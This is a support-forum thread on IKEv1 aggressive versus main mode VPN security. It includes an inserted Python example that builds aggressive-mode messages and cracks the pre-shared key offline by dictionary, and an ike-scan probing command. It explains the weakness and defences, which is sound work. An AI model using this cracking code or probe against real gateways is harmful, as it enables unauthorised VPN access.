Support Forum
dirkdigs
New Contributor

aggressive mode vs main mode

How secure is aggressive mode? I know it's faster than main mode, with fewer exchanges, but what does it send in clear text? Is this a security issue?
emnoc
Esteemed Contributor III

It's not as secure for IKEv1. Authentication parameters are leaked unencrypted, and with 3 exchanges vs. 6 for main mode. BTW, you should be using it (aggressive) for dialup or dynamic VPNs. FWIW, IKEv2 doesn't have these issues.

PCNSE NSE StrongSwan
dirkdigs
New Contributor

So the key exchanges are not encrypted. What about the user login/password? Is this still encrypted with aggressive mode? How do I secure my dialup VPN?
Istvan_Takacs_FTNT

C'mon man, if you really are FCNSP certified then you should know the answer to this basic question without asking it on a public forum. Seems it was really time to reform the certification path, as it appears it starts to get diluted, and it could end up like the MCSE one that could be bought at the local fishmonger for $5 in its final days. BTW, the answer to your question can also be found after a quick look at the product documentation: Choosing main mode or aggressive mode http://docs-legacy.fortinet.com/fos50hlp/50/index.html#page/FortiOS%205.0%20Help/phase1.111.04.html
dirkdigs
New Contributor

Found the answer: http://blog.spiderlabs.com/2013/03/cracking-ike-aggressive-mode-hashes-part-1.html @Istvan, thanks for your dumb comment.
emnoc
Esteemed Contributor III

Istvan, that was harsh, and probably most security engineers, regardless of FCNSP status, would not know the difference between the two, or even what quick mode is. Dirkdigs, I have never seen aggressive mode used outside of dialup VPNs, where you can't readily define the peer address since it's dynamic or an "any" (0.0.0.0/0). IKEv2 is a better choice all around but might be limited by VPN client support.

PCNSE NSE StrongSwan
ede_pfau
Esteemed Contributor III

I agree that we are all not around these forums to get bashed for asking. Let's just keep to the polite and informative style that makes this place special. Besides, I don't even have an FCNSP certification and still just don't know so many things, though I've got 10 years of experience with Fortinet now. I'm glad I have a place where I can ask fellow colleagues for advice. @dirkdigs I _did_ know that the IDs were exchanged in clear text when using AgMode, but the blog you referred to was interesting and showed me something new. Namely, that one can brute-force an IPsec VPN, more easily with AgMode, and how. So, having the log flooded with unsuccessful attempts to establish a tunnel should ring the alarm bells. The new improved IPS rate filters of FOS 5.2 come to my mind.

Ede

"Kernel panic: Aiee, killing interrupt handler!"
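The two points made above (emnoc's "authentication parameters are leaked unencrypted" and the offline brute force the SpiderLabs article describes) are easy to see in code. The following is an added example, not code from any post in this thread and not Fortinet's or ike-scan's code. It builds the two clear-text aggressive-mode messages of an IKEv1 pre-shared-key exchange with constructed values (random nonces, placeholder SA and DH bytes, made-up identities `user@example.com` / `vpn.example.com`, made-up PSK `fortinet123`), parses the responder's message to show the ID and HASH_R payloads are readable, and then recovers the PSK from a small wordlist exactly the way `psk-crack` would, using only the RFC 2409 definition of HASH_R and the Python standard library:

```python
"""
Added example: what an IKEv1 aggressive-mode PSK exchange exposes, and why
that lets an attacker crack the pre-shared key offline (RFC 2409 s.5.4).
The two messages are constructed here with random nonces and placeholder
SA/DH bytes; they are not a capture from any device.
"""
import hashlib
import hmac
import os
import struct

EXCH_AGGRESSIVE = 4                                 # ISAKMP exchange type
PAYLOAD = {1: "SA", 4: "KE", 5: "ID", 8: "HASH", 10: "NONCE"}
ID_TYPES = {1: "IPV4_ADDR", 2: "FQDN", 3: "USER_FQDN", 11: "KEY_ID"}


def build_message(cky_i, cky_r, exch, payloads):
    """Serialise an ISAKMP message from a list of (payload type, body)."""
    body = b""
    for i, (_ptype, pbody) in enumerate(payloads):
        nxt = payloads[i + 1][0] if i + 1 < len(payloads) else 0
        body += struct.pack("!BBH", nxt, 0, 4 + len(pbody)) + pbody
    hdr = cky_i + cky_r + struct.pack("!BBBBII", payloads[0][0], 0x10,
                                      exch, 0, 0, 28 + len(body))
    return hdr + body


def parse_message(msg):
    """Walk the payload chain and return every phase-1 field readable on the wire."""
    nxt, _ver, exch, flags, _mid, length = struct.unpack("!BBBBII", msg[16:28])
    if length != len(msg):
        raise ValueError("ISAKMP length field does not match message")
    payloads, off = {}, 28
    while nxt != 0:                                  # generic payload header chain
        pnext, _res, plen = struct.unpack("!BBH", msg[off:off + 4])
        payloads[PAYLOAD.get(nxt, str(nxt))] = msg[off + 4:off + plen]
        nxt, off = pnext, off + plen
    out = {"cky_i": msg[:8], "cky_r": msg[8:16], "exchange": exch,
           "encrypted": bool(flags & 1), "payloads": payloads}
    if "ID" in payloads:                             # ID body: type, proto, port, data
        out["id_type"] = ID_TYPES.get(payloads["ID"][0], "?")
        out["id_data"] = payloads["ID"][4:]
    return out


def hash_r(psk, ni, nr, gxr, gxi, cky_r, cky_i, sai_b, idir_b, h=hashlib.sha1):
    """HASH_R for pre-shared-key authentication, exactly as RFC 2409 defines it."""
    skeyid = hmac.new(psk, ni + nr, h).digest()      # SKEYID = prf(PSK, Ni_b | Nr_b)
    return hmac.new(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b, h).digest()


def crack_psk(msg1, msg2, wordlist, h=hashlib.sha1):
    """Offline dictionary attack: return the candidate that reproduces HASH_R, else None."""
    m1, m2 = parse_message(msg1), parse_message(msg2)
    if m2["exchange"] != EXCH_AGGRESSIVE or m2["encrypted"]:
        raise ValueError("not a clear-text aggressive-mode response")
    p1, p2 = m1["payloads"], m2["payloads"]
    for cand in wordlist:                            # every input except the PSK is public
        guess = hash_r(cand, p1["NONCE"], p2["NONCE"], p2["KE"], p1["KE"],
                       m2["cky_r"], m1["cky_i"], p1["SA"], p2["ID"], h)
        if hmac.compare_digest(guess, p2["HASH"]):
            return cand
    return None


def make_exchange(psk):
    """Constructed messages 1 (I->R) and 2 (R->I); SA and DH values are placeholders."""
    cky_i, cky_r = os.urandom(8), os.urandom(8)
    ni, nr = os.urandom(20), os.urandom(20)
    gxi, gxr = os.urandom(128), os.urandom(128)      # stand-ins for DH public values
    sai_b = struct.pack("!II", 1, 1) + b"placeholder-proposal"      # DOI, situation, proposal
    idii_b = struct.pack("!BBH", 3, 17, 500) + b"user@example.com"  # USER_FQDN, UDP/500
    idir_b = struct.pack("!BBH", 2, 17, 500) + b"vpn.example.com"   # FQDN, UDP/500
    msg1 = build_message(cky_i, b"\x00" * 8, EXCH_AGGRESSIVE,       # CKY-R still zero
                         [(1, sai_b), (4, gxi), (10, ni), (5, idii_b)])
    hr = hash_r(psk, ni, nr, gxr, gxi, cky_r, cky_i, sai_b, idir_b)
    msg2 = build_message(cky_i, cky_r, EXCH_AGGRESSIVE,
                         [(1, sai_b), (4, gxr), (10, nr), (5, idir_b), (8, hr)])
    return msg1, msg2


if __name__ == "__main__":
    msg1, msg2 = make_exchange(b"fortinet123")       # made-up PSK
    m2 = parse_message(msg2)
    print("responder ID in clear:", m2["id_type"], m2["id_data"])
    print("HASH_R in clear:", m2["payloads"]["HASH"].hex())
    print("cracked PSK:", crack_psk(msg1, msg2, [b"password", b"fortinet", b"fortinet123"]))
```

Nothing in `crack_psk` needs the DH shared secret: HASH_R is an HMAC over values that both sides send unprotected, keyed only by the PSK. An attacker who can send message 1 to the gateway (which is all `ike-scan -A` does) therefore gets everything needed for an offline dictionary attack, which is why a short, guessable group PSK on a dialup aggressive-mode tunnel is the real risk; a long random PSK only raises the cost, while IKEv2 or certificate authentication removes the exposure.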
Christopher_McMullan

Good article. I love networking: you're always learning something new! A good way to prevent unauthorized attempts, if you are deploying a site-to-site VPN, is to create a local-in policy denying any UDP port 500 traffic into your local external interface (the one terminating the VPN) unless it comes from the known public IP of the VPN peer.

    config firewall local-in-policy
        edit 0
            set ...
            ...
    end

Regards, Chris McMullan Fortinet Ottawa

dirkdigs
New Contributor

So is it possible to even get a response back from the FortiGate using the ike-scan utility? The article talks about the Cisco ASA; however, I have not been successful trying this on the FortiGate.
netmin
Contributor II

Yes, it is. Try using locally "diag debug application ike -1" to see what the FGT sees (but might not respond to). For example, a command like "ike-scan -A -g 5 <IP>" returns some information when DH group 5 is used and aggressive mode.